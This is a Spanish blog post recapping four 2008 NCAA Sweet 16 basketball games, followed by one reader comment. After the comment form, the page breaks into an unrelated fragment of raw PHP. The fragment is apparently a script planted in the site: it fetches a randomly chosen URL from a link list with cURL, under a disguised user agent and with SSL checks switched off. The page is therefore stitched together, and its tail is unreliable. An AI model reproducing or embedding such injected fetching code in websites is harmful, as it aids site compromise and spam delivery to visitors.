Primeros partidos de los Sweet 16

28 de March de 2008 por txusma

RusticoColorao, nuestro corresponsal en la NCAA que tan buen trabajo realizó en las primeras rondas tiene problemas de conexión por lo que intentaremos paliar su baja y seguir informando sobre la March Madness.

Recordemos los enfrentamientos de los Sweet 16:

  • EAST: North Carolina (1) – Washington St. (4); Louisville (3) – Tenesse (2);
  • MIDWEST: Kansas (1) – Villanova (12); Wisconsin (3) – Davidson (10);
  • SOUTH: Memphis (1) – Michigan St. (5); Stanford (3) – Texas (2);
  • WEST: UCLA (1) – Western Ky. (12); Xavier (3) – West Virginia (7).

Anoche se disputaron los partidos de la división Este y de la Oeste y a falta de grandes sorpresas, nos dejaron grandes actuaciones individuales y jugadores a tener en cuenta de cara al próximo draft. Repasemos uno a uno los partidos de ayer.

North Carolina 68 – 47 Washington St.

Los Tar Heels están de nuevo a un paso de la Final Four y esperan evitar lo que les pasó el año pasado cuando fueron eliminados por Georgetown en el último momento. Los 16 puntos de Tyler Hansbrough en la segunda parte (18 puntos en total a los que sumó 9 rebotes) y el poco acierto de Washington en el tiro (32%) fueron las claves de la victoria de North Carolina, que ven más cerca la que sería su 17ª participación en la Final Four. Danny Green con 15 puntos fue otro de los destacados del equipo vencedor, que no llegó a los 100 puntos por primera vez en el campeonato pero que, por contra, permitió la menor anotación en contra en 47 años. Por los Cougars tan solo Aron Baynes, con 14 puntos y 8 rebotes dió la cara.

Louisville 79 – 60 Tenesse

Rick Pitino esta más cerca de su sexta visita a lo Final Four y lo está como a él le gusta: con una fuerte y dura defensa, cambiante segun los acontecimientos del partido, contra la que no pudo hacer nada el ataque de los Volunteers que se quedaron en un triste 34% en tiros de campo. Earl Clarck anotó 17 puntos y capturó 12 rebotes, convirtiéndose en el mejor de su equipo, aunque contó con la colaboración de McGee y Smith que anotaron 13 puntos cada uno. Chris Lofton (el tercer jugador de la historia de la NCAA en triples anotados con 429) falló los primeros 7 triples que intentó, acabando con 15 puntos en su último partido para Tenesse. Lousville está jugando su mejor baloncesto y lo está haciendo realmente cuando importa, por lo que no es descabellado pensar que podrían darle un buen susto a los Tar Heels.

Xavier 79 – 75 West Virginia

En unos críticos 48 segundos de la prórroga, BJ Raymond anotó más triples (2) que todo el equipo de West Virginia en todo el partido y es que los Mountaineers acabaron con 1 triple conseguido de 11 lanzamientos. Xavier llegó a ganar de 18 puntos al principio del encuentro, pero se dejó remontar y llegó a ir perdiendo de 6 puntos en la prórroga, momento en el que apareció BJ Raymond que anotó todos sus puntos en el tiempo extra, cuando las manos tiemblan. Aparte de Raymond el jugador más destacado fue Josh Duncan (un ala pivot fuertísimo) con 26 puntos y que no pudo jugar todo lo deseable por problemas de faltas. En West Virginia el máximo anotador con 18 puntos fue Joe Alexander que además recogió 10 rechaces. Xavier buscará entrar en la Final Four aunque para ello deberá eliminar a la temible UCLA, tarea nada sencilla.

UCLA 88 – 78 Western Ky.

Son los máximos favoritos y volvieron a demostrarlo, aunque no sin susto incluido. Los Bruins, que quieren hacer válido eso de “al tercer intento va la vencida”, ganaban de 21 puntos al descanso pero vieron como los Hilltoppers se ponían a 4 a tan solo 5 minutos de partido. Es algo que deberán vigilar si quieren conseguir la victoria final. Kevin Love con 29 puntos, 14 rebotes y 4 tapones fue el auténtico dominador del partido y se convierte en uno de los pocos jugadores que han promediado más de 20-10 en los 3 primeros partidos de la March Madness. Love contó con la ayuda de James Keefe, cuyos 18 puntos y 12 rebotes, son récord en su carrera. Russell Westbrook añadió 14 puntos y 11 rebotes. Por parte de Kentucky Tyrone Brazelton con 31 puntos y Courtney Lee con 18 y 8 rebotes, fueron los más destacados.

 

 

Comenta

Un comentario a esta entrada

  1. RusticoColorao dice:
    #1

    Grande Txusma grande…disculpad por el plantón informativo pero con el viaje a obra no doy a basto. Espero seguir leyendo este foro tan de puta madre (¿hay censura?) desde el barracón jajajaja

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>